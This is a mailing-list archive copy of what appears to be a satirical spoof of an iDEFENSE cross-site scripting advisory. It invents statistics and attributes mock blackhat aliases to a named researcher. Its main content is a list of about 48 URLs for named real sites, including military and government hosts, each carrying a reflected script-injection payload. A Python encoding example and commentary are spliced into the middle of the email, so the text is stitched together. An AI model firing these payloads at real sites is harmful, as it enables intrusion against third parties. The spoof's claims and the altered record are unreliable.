Full Disclosure mailing list archives

iDEFENSE Security Advisory 10.21.02: Cross-Site Scripting Holes present in virtually all websites


From: David Endler<dendler () idefense com>
Date: Mon, 21 Oct 2002 00:45:18 -0400 (EDT)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

iDEFENSE Security Advisory 10.21.02:
http://www.idefense.com/advisory/10.21.02.txt

i.  Cross-Site Scripting Holes present in virtually all websites/web-services.
ii. Fully-Automated XSS-exploiting AI anti-semite terrorist robots found in the wild.

Release Date : October 21, 2002


I. BACKGROUND

Cross-Site Scripting (hereafter referred to pseudo-acronymously as XSS) is a method of host and network intrusion 
pioneered by network security luminaries such as ZENOMORPH (zeno () cgisecurity net) and iDEFENSE's own DAVIDENDLER 
(dendler () idefense com). It is considered one of the top 10 threats to Internet and National Security and has 
resulted in numerous CERT, NIPC, FBI and SANS alerts. A XSS FAQ (authored by said luminaries) is available at 
http://www.cgisecurity.com/articles/xss-faq.shtml. 


David Endler (known in Blackhat circles as urlmazter[BoW/h4g1s/ac1db1tch3z/TMD/RaZoR]) writes the following on the 
subject of XSS:

"It seems today that Cross-Site Scripting (XSS) holes in popular web applications are being discovered and disclosed at 
an ever-increasing rate. Just glancing at the Bugtraq security mailing list archives over the first half of 2002 shows 
countless postings of XSS holes in widely used websites and applications. This new iDEFENSE Labs XSS paper predicts 
that fully and semi-automated techniques will aggressively begin to emerge for targeting and hijacking web 
applications using XSS, thus eliminating the need for active human exploitation. Some of these techniques are detailed 
along with solutions and workarounds for web application developers and users. It is available at 
http://www.idefense.com/XSS.html for download.

II. DESCRIPTION

iDEFENSE has determined that 98% of websites, especially those utilizing "scripts" or "active content", contain at 
least one passing-unfiltered-user-input-back-to-the-user-inside-html-page vulnerability that could lead to 
denial-of-service attacks against legitimate users, cookie and session theft, arbitrary html execution, malicious 
GIF/TIF injection, erroneous counter statistics, cross-frame spoofing (see idefense.com for details), crossed-bean java 
infection (see idefense.com for details), cross-img-src 1x1pixel web-bug injection and spoofing (see idefense.com for 
details), web-application muscle and nerve exhaustion attacks, and inappropriate or stalled/delayed 
fullscreen-pop-under banner-advertisement serving to opt-in users. 

In addition to the above discovery, it was noted that many search engines (hereafter referred to as "search engines") 
allow for rapid identification of potentially vulnerable sites. Coupled with widespread availability of email and 
newsgroup discussion services on the Internet, the dissemination of information regarding potential vulnerable servers 
is highly expedited. This allows the hacker community (hereafter referred to as 'skiddiotards') to broadcast their 
findings to their peers, which results in obscure domains and servers being targeted by large numbers of neophyte 
skiddiotards in a very short period of time.

III. IMPACT

The impact of an XSS attack should not be underestimated. It has been discovered that close to 90% of all identified 
XSS vulnerabilities allow an attacker to execute arbitrary HTML (and JavaScript) code with the same privileges as a 
standard website. Put simply, an attacker taking advantage of a XSS-vulnerability can force unsuspecting users to 
display and/or execute webpages that they had not previously requested. This is equivalent to creating a malicious 
website, and enticing users to visit the page with an appropriate HTML browser client, or attaching said malicious HTML 
to an email message.

Technical Note 1: Many website operators rely on cookies and session IDs to identify and track their users.
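The vulnerability class the description and impact sections talk about is a server script that copies a query parameter (typically `title`) straight into the HTML it returns. The following Python is an added example, not part of the advisory and not iDEFENSE code: it renders a page the vulnerable way and the hardened way (HTML-entity encoding at output time) for the two contexts that appear in the example URLs, element text inside `<title>` and a quoted attribute value. The payload strings are copied from the advisory's own URLs; the page fragments and function names are assumptions made for the example.

```python
import html

# Payloads taken from the advisory's example URLs (constructed test input for this example).
TITLE_CONTEXT_PAYLOAD = '</title><script>alert("iDEFENSE.COM");</script>'
ATTR_CONTEXT_PAYLOAD = '";><script>alert("iDEFENSE.COM");</script>'


def render_title_vulnerable(title: str) -> str:
    """Reflects the 'title' parameter unchanged into element text: the flaw the advisory describes."""
    return f"<html><head><title>{title}</title></head><body>page body</body></html>"


def render_title_hardened(title: str) -> str:
    """Same page, but the value is entity-encoded before it reaches the markup.
    html.escape(quote=True) encodes & < > \" and ', so the browser sees text, not tags."""
    safe = html.escape(title, quote=True)
    return f"<html><head><title>{safe}</title></head><body>page body</body></html>"


def render_attr_vulnerable(title: str) -> str:
    """Reflects the value inside a double-quoted attribute (the ';><script> variant on the page)."""
    return f'<form><input type="text" name="title" value="{title}"></form>'


def render_attr_hardened(title: str) -> str:
    """Encoding the double quote keeps the attacker-controlled value inside the attribute."""
    safe = html.escape(title, quote=True)
    return f'<form><input type="text" name="title" value="{safe}"></form>'


def contains_script_element(page: str) -> bool:
    """Crude check used by the demo: does the rendered document contain a literal <script tag?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    for name, vuln, hard, payload in (
        ("title element", render_title_vulnerable, render_title_hardened, TITLE_CONTEXT_PAYLOAD),
        ("attribute value", render_attr_vulnerable, render_attr_hardened, ATTR_CONTEXT_PAYLOAD),
    ):
        print(f"{name}: vulnerable renders <script>? {contains_script_element(vuln(payload))}")
        print(f"{name}: hardened renders <script>?   {contains_script_element(hard(payload))}")
        print("  hardened output:", hard(payload))
```

Output encoding has to match the context the value lands in; `html.escape(..., quote=True)` covers element text and quoted attributes, but a value written into a `<script>` block or a URL attribute needs a different encoder.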

IIIII. SOLUTION

Appropriate Anti-XSS Defense Mechanisms (ADMs) should be included in your organizational security policy. The iDEFENSE 
Site Security Standards Charter 2002 (iSSSC02) recommends a 2-layered approach encompassing both a technical and 
operational component to ensure maximum transparency and pro-activity. iDEFENSE is the world's premier supplier of 
Anti-XSS defense software and consultancy services. For your free XSS Vulnerability Assessment Quote (iDEFXVAQ), please 
contact our sales, marketing and merchandising department at the number(s) listed below. 

III. EXAMPLES

The following sites and services have been found to be vulnerable to at least 1 (One) XSS (cross-site-scripting) 
vulnerability which may or may not lead to arbitrary webpage injection to website visitors, and stuff.

http://www.thecanadianteacher.com/cgi-bin/links/error.cgi?ID=483&title=</title><script>alert("iDEFENSE.COM");</script>
http://www.sinotrade.com.tw/ec/mo/show.asp?title=</title><script>alert("iDEFENSE.COM");</script>
http://internetwoordenboek.kennisnet.nl/inetwdb/show.asp?qu=<script>alert("iDEFENSE.COM");</script>
http://www.agnosia.com/html/albums-show.asp?cd=PappaResolution&title=<script>alert("iDEFENSE.COM");</script>
http://www.atsic.gov.au/tools/links_list.asp?Category=<script>alert("iDEFENSE.COM");</script>
http://www.cheshire.gov.uk/AtoZ/azdetails.asp?TextId=88&Title=<script>alert("iDEFENSE.COM");</script>
http://www.elearningpost.com/elthemes/addcomments.asp?theme=govlearn&title=<script>alert("iDEFENSE.COM");</script>
http://www.audit-commission.gov.uk/aboutus/what-london.asp?title=<script>alert("iDEFENSE.COM");</script>
http://www.parcomp-inc.com/mpages/x_SAV19Y5XY.asp?title=";><script>alert("iDEFENSE.COM");</script>
http://home.nauticom.net/main%20subs/about.asp?title=</title><script>alert("iDEFENSE.COM");</script>
http://www.uch.edu/content/aboutus/content.asp?index=AboutUsDocs&title=<script>alert("iDEFENSE.COM");</script>
http://www.info4local.gov.uk/singleLink.asp?linkId=1594&heading=<script>alert("iDEFENSE.COM");</script>
http://www.goarticles.com/cgi-bin/search.cgi?c=52&title=<script>alert("iDEFENSE.COM");</script>
http://www.b2bautosalvage.com/oldrep/exch_1031.cfm?inv_id=<script>alert("iDEFENSE.COM");</script>&inv_id_2=1
http://tcc.comptia.org/certification_detail.cfm?CERTIFICATIONID='hacker'&TITLE=<script>alert("iDEFENSE.COM");</script>
http://form-engine.com/help.asp?chapter=FAQ&title=<script>alert("iDEFENSE.COM");</script>
http://www.apcity.org/en_apcity/en_soluti/en_soluti_4.jsp?Title=<script>alert("iDEFENSE.COM");</script>
http://www.sergey.com/cgi-bin/get.cgi?show=l_sec&title=hi</title><script>alert("iDEFENSE.COM")</script>
http://www.trabucocanyon.com/local_Contacts.cfm?title=<script>alert("iDEFENSE.COM")</script>
http://www.biola.edu/admissions/actions/process_favorites.cfm?title=<script>alert("iDEFENSE.COM")</script>
http://laissezfairebooks.com/search-results.cfm?title=<script>alert("iDEFENSE.COM")</script>
http://cybrary.uwinnipeg.ca/resources/e-journals/Action-2.cfm?Title=<script>alert("iDEFENSE.COM")</script>
http://www.geocrawler.com/mail/thread.php3?subject=</title><script>alert(document.body);</script>
http://www.iww.uni-karlsruhe.de/cgi-bin/webmail?to=izv4&subject=";><script>alert("iDEFENSE.COM")</script>
http://www.touchv.com/cgi-bin/webmail.cgi?to=";><script>alert("iDEFENSE.COM")</script>
http://www.nibbleguru.com/cgi-bin/refer.cgi?ID=97&title=</title><script>alert("iDEFENSE.COM")</script>
http://www.findwebspace.com/glossary/glossary.asp?text=<script>alert("iDEFENSE.COM")</script>
http://www.worldsmine.com/cgi-bin/search.cgi?keywords=<script>alert("iDEFENSE.COM")</script>
http://www.cast.org/teachingeverystudent/ideas/print.cfm?name=<script>alert("iDEFENSE.COM")</script>
http://nas.nawcad.navy.mil/qol/mwr/text/index.cfm?page=<script>alert("iDEFENSE.COM")</script>
http://www.delphipages.com/resume/resume.cfm?ID=300<script>alert("iDEFENSE.COM")</script>
http://www.jerkoftheweek.com/archivetemplate.cfm?date=<script>alert("iDEFENSE.COM")</script>
http://www.collegefortexans.com/cfbin/tofa2.cfm?ID=<script>alert("iDEFENSE.COM")</script>
http://www.chickenchow.com/product.cfm?id=106&apos;<script>alert("iDEFENSE.COM")</script>
http://www.cyberforum.com.br/forum-section.cfm?ID=<script>alert("iDEFENSE.COM")</script>
http://www.horsesmidwest.com/photoad_detail.cfm?ID=<script>alert("iDEFENSE.COM")</script>
http://www.cecer.army.mil/td/tips/product/details.cfm?ID=<script>alert("iDEFENSE.COM")</script>
http://www.swt.usace.army.mil/~news/NewsDetail.CFM?ID=188<script>alert("iDEFENSE.COM")</script>
https://www.afml.ft-detrick.af.mil/afmlo/FAQ/FAQ_Detail.cfm?ID=11<script>alert("iDEFENSE.COM")</script>
http://www.navylearning.navy.mil/help/index.cfm?KEYPAGE=VIEWHELP&ID=<script>alert("iDEFENSE.COM")</script>
http://www.norva.navy.mil/navosh/course3fy02.cfm?ID=<script>alert("iDEFENSE.COM")</script>
http://www.vis-security.com/projects/sec-projects.cfm?catid=2<script>alert("iDEFENSE.COM")</script>
http://www.happyflying.com/print_story.cfm?ID=15<script>alert("iDEFENSE.COM")</script>
http://www.greenbackedheron.com/id.cfm?setid=<script>alert("iDEFENSE.COM")</script>
http://www.sexualhealth.com/questions/read.cfm?ID=69<script>alert("iDEFENSE.COM");</script>
http://www.pga.com/Newsline/Tour_News/tournews_detail.cfm?ID=9755<script>alert("iDEFENSE.COM")</script>
http://www.screensaver.com/ScreensaverLibrary.cfm?ID=<script>alert("iDEFENSE.COM")</script>
http://btob.barnesandnoble.com/btbrecommended.asp?title=<script>alert("iDEFENSE.COM");</script>&CATID=96&sourceid=0039357117&btob=Y

Technical Note 2: all of these vulnerable sites were found using www.alltheweb.com "search inside URL" advanced "search 
engine" feature. Only by blocking access to such "search engine" features can a site administrator reduce the number of 
potential XSS attacks originating from his or her domain.

Technical Note 3: almost all the .cfm boxes listed above are also vulnerable to SQL injection. This was not tested by 
iDEFENSE as some of these servers are in the .mil TLD-domain and SQL injection probes could be interpreted as an act of 
war.

IIII. CREDIT

iDEFENSE wishes to thank the following people for their contributions to this advisory and to the study of XSS attack 
and defence methods:

Zeno Morph (zeno () cgisecurity net)
Michael Sutton (msutton () idefense com)
Jeremiah Grossman (jeremiah () whitehatsec com)
Lex Arquette (lex () whitehatsec com)
Ulf Harnhammar (ulfh () update uu se)

IVI. SOLUTION

Please visit the following websites for more information on cross-site-scripting (XSS) and computer security:

"Cross-site scripting tears holes in Net security"
http://www.usatoday.com/life/cyber/tech/2001-08-31-hotmail-security-side.htm

Article on XSS holes
http://www.perl.com/pub/a/2002/02/20/css.html

"CERT Advisory CA-2000-02 Malicious HTML Tags Embedded in Client Web Requests"
http://www.cert.org/advisories/CA-2000-02.html

Paper on Removing Meta-characters from User Supplied Data in CGI Scripts.
http://www.cert.org/tech_tips/cgi_metacharacters.html

Paper on Microsoft's Passport System
http://eyeonsecurity.net/papers/passporthijack.html

Paper on Cookie Theft
http://www.eccentrix.com/education/b0iler/tutorials/javascript.htm#cookies

The webappsec mailing list (Visit www.securityfocus for details)
webappsec () securityfocus com



!!!!!!!!!!!!!! Get paid for security research !!!!!!!!!!!11

http://www.idefense.com/contributor.html

!!!!!!!!!!!!!! Subscribe to iDEFENSE Advisories: !!!!!!!11

send email to listserv () idefense com, subject line: "subscribe"




- -dave

David Endler, CISSP
Director, Technical Intelligence
iDEFENSE, Inc.
14151 Newbrook Drive
Suite 100
Chantilly, VA 20151
voice: 703-344-2632
fax: 703-961-1071

dendler () idefense com
www.idefense.com

-----BEGIN PGP SIGNATURE-----
Version: PGP 7.1.2
Comment: http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x4B0ACC2A

iQA/AwUBPZnxEErdNYRLCswqEQLrkACdHdU6cpv+NEzsJPi4ZZQxe2iy2NkAoKn0
ddyu8Js8PWZ/LMCNh+hYejfz
=CEof
-----END PGP SIGNATURE----- 
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html